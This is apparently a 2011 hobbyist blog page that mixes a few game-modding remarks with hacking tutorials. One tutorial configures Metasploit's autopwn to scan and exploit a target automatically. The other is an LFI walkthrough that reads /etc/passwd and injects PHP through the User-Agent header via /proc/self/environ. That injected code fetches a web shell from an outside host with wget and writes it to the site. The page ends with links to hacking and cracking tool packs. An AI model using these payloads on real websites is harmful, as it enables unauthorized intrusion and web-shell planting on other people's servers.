replacing the minigun with 50 caliber machine freezes the game
this could be due to animation file incompadibilitys...

got me a PSP 1001 black (x2)

Yes, 2 psps with out battery but I do have charger for it, but I don't have Memory Stick Duo im going to buy one from my friend at July 16. Then when I get into psp game making im going to make Halo 2 PSP. Uses halo 2 sounds, and models from custom edition this should make it h2 version.

Wednesday, July 6, 2011

Metasploit Autopwn fix for Backtack 5

A lot of people are having trouble with Metasploit's Autopwn feature in Backtrack 5. It does require a little bit of tweaking to get going, below are a few steps to get you on your way.
I prefer to use postgreSQL over MySQL. This tutorial will only show how to properly configure Autopwn using postgreSQL.
First you must determine if you have postgres installed on your system. To do this type the following into a terminal:
ls /etc/init.d/ | grep post

If you do not see "postgresql-8.4" you need to update or install postgresql. This can be done using the repositories:

apt-get install postgresql-8.4 postgresql-client-8.4

Now start the postgreSQL server by typing:

/etc/init.d/postgresql-8.4 start

NOTE: If you receive an error like;

"The PostgreSQL server failed to start. Please check the log output:"

You will need to disable SSL in the config file. To do this

nano /etc/postgresql/8.4/main/postgresql.conf

Look for the section like the one below:

Code:
# - Security and Authentication -
#authentication_timeout = 1min # 1s-600s

#ssl = true # (change requires restart) You simply comment it out like I did above with the "#" sign.
Now restart postgres:
/etc/init.d/postgresql-8.4 start
Now connect to the server and change the password to whatever you want:
sudo su postgres -c psql

ALTER USER postgres WITH PASSWORD 'yoursecretpasswd ';
(make sure to use the quotation marks when setting your password, here is a real life example)

ALTER USER postgres WITH PASSWORD 'swordfish ';\q sudo passwd -d postgres

sudo su postgres -c passwd
(Here you want to use the same password you used a few steps back)

Postgresql is all setup, now to Metasploit.
Start Metasploit by typing: msfconsole
Once Metasploit starts, type: db_driver
If the driver is already loaded it will give an ouput like below.
autopwn

If not, you will need to manaully load the driver by typing: db_driver postgresql

Now all you have to do is connect to your database by typing (pentest is the name of the database):
db_connect postgres:mysecretpassword@127.0.0.1/metasploit autopwn

We are now connected and ready to run autopwn.
Run a nmap scan on the target:
db_nmap 192.68.12.99 To see all of autopwn's options type: db_autopwn
Finally launch the autopwn and let sit back and wait:
db_autopwn -p -t -e -r

After autopwn completes type:
sessions -l Any successfull attacks will result in a session. To interact with that session type:
sessions -i 1 (where 1 is the session number)

Monday, July 4, 2011

[LFI]Local File Inclusion and shell upload[Tutorial]

LFI (Local File Inclusion)


1 â€“ Introduction

In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and
injection malicious code in proc/self/environ.Is a step by step tutorial.

2 â€“ Finding LFI

- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.

Code:
www.website.com/view.php?page=contact.php

- Now lets replace contact.php with ../ so the URL will become

Code:
www.website.com/view.php?page=../

and we got an error

Code:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

big chances to have a Local File Inclusion vulnerability.Letâ€™s go to next step.

- Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :

Code:
www.website.com/view.php?page=../../../etc/passwd

we got error and no etc/passwd file

Code:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up

Code:
www.website.com/view.php?page=../../../../../etc/passwd

we succesfully included the etc/passwd file.

Code:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

3 â€“ Checking if proc/self/environ is accessible

- Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ

Code:
www.website.com/view.php?page=../../../../../proc/self/environ

If you get something like

Code:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

4 â€“ Injecting malicious code

- Now letâ€™s inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :

Code:
www.website.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in User-Agent filed write the following code :

Code:
<?system(wget http://fbi.20x.cc/gov/data/R00TSH3ll.txt -O sh3ll.php);?>
{The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread}

Then submit the request.

Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt {The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread} and will save it as shell.php in the
website directory) through system(), and our shell will be created.If donâ€™t work,try exec() because system() can be disabled on the webserver from php.ini.

5 â€“ Access our shell

- Now lets check if our malicous code was successfully injected.Lets check if the shell is present.

Code:
www.website.com/sh3ll.php

Our shell is successfully uploaded.

All In One Collection Tutorials & Tools Uploaded By sheikh_shahzeb More Than 10 GB

By -

sheikh_shahzeb
Infinity Exists Underground and vblog Compete Tutorials

Free File Hosting Made Simple - MediaFire

BT 4 Tutorials

Free File Hosting Made Simple - MediaFire

Milworm Tutorials

Free File Hosting Made Simple - MediaFire

BT Offensive Security Tutorials

Free File Hosting Made Simple - MediaFire

Other Collection of Hacking Videos

Free File Hosting Made Simple - MediaFire

My Ways Of Hacking Go Here

Free File Hosting Made Simple - MediaFire

Must Use Tools in Hacking

Free File Hosting Made Simple - MediaFire

Download BackTrack R2

Free File Hosting Made Simple - MediaFire

Cracking Collection

Free File Hosting Made Simple - MediaFire

join files with winrar and hjsplit

to watch videos use klite media player and codecs

try suspicious files in sandbox or in virtual machine like in vmware for your own security i am sharing vmware also here

http://www.mediafire.com/?0zk8bmcb51033

Here Is First DVD OF CEH Labs Volume 1

CEH Labs Volume 1

If Ask Any Password type creativemediafire.tk

it takes more than a month to upload but i think usefull for all thats why i am sharing it

100 virus clean learn ethical ways of hacking